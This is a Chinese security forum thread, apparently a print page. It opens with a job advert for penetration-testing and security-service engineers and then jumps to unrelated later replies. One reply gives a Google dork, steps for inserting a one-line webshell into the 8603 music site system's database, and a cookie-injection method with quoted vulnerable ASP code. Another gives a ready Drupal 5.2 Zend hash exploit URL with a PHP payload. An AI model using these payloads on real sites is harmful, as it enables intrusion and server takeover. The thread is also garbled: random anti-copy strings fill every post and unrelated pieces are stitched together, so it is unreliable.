Board logo

标题: [人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦! [打印本页]

作者: 無情    时间: 2016-8-24 12:48     标题: 浙江政安信息安全研究中心招贤纳士啦!

浙江政安信息安全研究中心招贤纳士啦!
9 l0 H! T6 N- P7 Q% |' W( q简历投递:352113371@qq.com
8 t' s! k: Z+ Q8 T5 l% v6 V
2 T2 y3 e" @6 U* `1 I6 L7 n职位:售前工程师 2名 【7000-15000】# Y  G  x, B. @4 H" `; \
岗位职责:8 @; h3 ]$ R  E9 y
1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;
" B( f$ J+ o% h2、配合销售人员准备与用户的技术交流、PPT等技术文件;. q) A0 k1 D! K+ g
3、负责信息安全咨询服务及安全服务的实施工作;& {6 o: E  N% ^% ^5 _2 `. Y
4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);( e+ z5 e7 }; \% i
5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;1 D% U) R0 ?( P
任职要求:% y4 @0 w, @8 N0 n/ j
1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;
9 A0 q1 d+ ?$ k5 z3 i2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;
  K. _& \, z9 M3 u# s$ S8 b0 l3、熟悉企业IT规划的方法论和过程;
; {- \- s' ~. a2 ?7 Z4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;/ G; a- \' Q! X5 x1 [; r" C
5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;
' [( x* U/ ?* B9 u0 d6 ~! [6、具有良好的客户沟通能力及技巧;5 ], s$ S8 m& w% a7 k* V3 s# i( r$ P
7、能适应经常性短期出差;; C% Y& P& f& ~2 ]  B) j
8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;& Y& H6 a( t+ V+ {- K. H+ Z! ?

! f2 C! k4 h  r% @职位:高级信息与网络安全工程师 3名 【5000-25000】# m4 D. A" {0 J. \' K
岗位职责:
) o7 C$ F2 ?2 f    常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。0 L, C2 q( z5 s: S/ V
任职条件:
  o  C3 B( [1 O$ h" w1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。' [$ ?3 T% R6 d0 Q( s
2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;; I2 a- |0 {7 a! t0 b& L0 R( G
3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;
9 S. a, l* V$ D8 h4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。0 X# u/ s; S! K! r4 H8 R
& v& O4 p" m' f: ^, D. Q$ i0 ^
职位: 安全服务工程师 3名 【5000-15000】
9 M. s: X6 {# u7 @- h$ d& \  C任职要求:4 ~4 K1 |. r6 ]2 f
1. 能力突出者专业学历不限;; Y: |) a% v0 C. \5 H
2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;* F* y$ ^- @- {: l/ x  h8 R) r. I
3. 熟练使用PHP、Python、Perl等任意一门编程语言;* v+ p5 _# U- @. R: |5 s
4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;+ n/ ~- ]& p6 J1 r0 i4 D- Z' f
5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;- v# E8 ]: p# l1 C) R1 U
6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。
/ H2 v, A( ^; i% i4 d( v4 d优先考虑:! r; n3 d$ D& e1 q5 n/ b! }$ _
1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低
8 {3 @3 ?2 S- M# @2.熟悉iOS & Android APP 等移动安全测试
$ O( z. W  m9 V/ U/ f1 T3.对智能设备、硬件安全测试有了解,熟悉相关常见协议
1 L& m. [% x5 Y5 K/ P4.有代码审计相关经验者,具备逆向分析能力更佳;
$ [. a; R$ X( G5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;  R# |8 N7 X6 Q) M) _
6.具有其它可以秒杀面试官能力
4 P3 G9 A- _: U/ n: u! e/ o+ G; }6 @5 G9 L7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;
作者: feiniao    时间: 2019-7-22 23:01

8603音乐网管理系统v2009.1001漏洞
8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

; l# b* u, ]4 F$ I8 s8 F7 ?! Q
数据库未作任何处理,可以插入一句话。继续插入经典一句话

$ Y& T1 X7 R2 {2 V; Q$ |
: f+ Y4 x- w2 j' B  Z
Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa

* r/ ?: |. L- j" x! L
二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")
: G6 f* `4 W9 s8 r6 z! _
这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。
2 [) R" B" p' L6 ]: X8 O
变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),

) ^+ y" S2 W$ R4 M/ a* n3 C" B
看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.
5 q  k& q- T) b
也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注
: e% _& f7 U! g# _  P+ ^: _
入也就产生了

7 `7 o, j( O0 V7 k
用注入中转。

/ H+ h- {1 r4 E4 O
6 S4 c! {0 C; u; c1 ~* R) X4 N# I  ~6 g4 y

1 {: Y+ i  d+ }3 v8 f2 O5 P8 i; f2 m3 ]; z# P- C  w. Z

* ~8 ^& I. n6 A0 ?1 {0 t% k% }
# P8 V: p% ?' `& ~% z0 P" i- ?1 U' l

' G, @9 |* A4 p! N+ H9 B, H5 V6 X0 M0 q; A  L; H, u7 ^

$ ~  L/ O& @- i1 E$ a4 s
" g2 ~( I3 d" |; m! }; @9 e* p0 [9 X6 z4 \
5 c1 u" _% h" _4 [; q
# T: e$ k1 i3 a' j) m. n' h  j
( z, j' S5 L. M7 q6 S* U% o

8 P- x  g9 T' L7 _- ]
1 q" A; I, L/ E3 w2 p5 p; v# ]/ B) Y2 ?
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: sanlen    时间: 2019-9-1 23:01

发贴看看自己积分,呵呵,好像没有楼猪的多。: d) G$ O1 B2 w; r8 H8 S
/ `  S$ M* h) y" v* I: v

. F# N9 J2 b1 p: l/ r" y. @! ~( x' ?& v+ Q6 K9 p! c2 s
/ d% D  Z- G3 _

& S: r& @6 \) Y5 a5 m9 z9 S
: ?9 a( x! v: k1 c* Q& N
- l- @' t( I3 h" K1 n% g! q3 e: X
2 B% W2 A8 y, \/ z: {; I( {+ x( V; w+ Q- c' E: Y
1 }2 R6 ?5 P+ L$ u

& |( w. H6 z0 k. |: l% f, W0 n
( U8 \& r4 A8 L- n3 e  p
: {- \! h! f: }% [$ L7 L" |- ^/ U1 q* s; [2 A2 }

0 ~& U' L8 l1 P) O! ?- J! G# U, }
0 `. ]; A/ ~$ h1 F( L
+ X8 q- s) l! e' v! d4 R- q: U+ U+ e/ I  L# e" Q+ I6 F+ e* [+ L- B
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: wwwsky    时间: 2019-9-26 23:01

php的zend哈希漏洞利用问题
Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();
) @+ T0 X, ]- |5 i4 B( f. P( M
* Z6 i1 i, t( W9 d, @' {7 p  i6 s$ I  S) Y$ ?" b) h
8 _2 @8 d% \8 g* R* b, s
* Z$ j. d* @6 C5 T; _" b0 m
* C4 t' D; g; J; B) ~( t
. g% m0 Q0 Z" j  k" w2 C
9 R% G2 u( g$ F6 ?" [

: _! D# l: z( u0 Z5 Q& T9 Q* Z1 N' e* v* F. I- B4 b6 T4 A3 w

! C% I, j4 [* e& t+ C  }
' u* w2 y" W5 X7 A3 O
( {0 J( _# U/ ~
8 ~# V$ X% N( ~: w9 J2 m% s
# {' G% m# G# f
' x" \4 [, j/ o2 r
4 P# b6 w2 P- K+ R4 W7 o3 U" r; E0 H. }3 i& v8 p7 d
9 H5 Y3 h1 ?# W3 E- Z
公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://sitedirsec.com/) Powered by Discuz! 7.2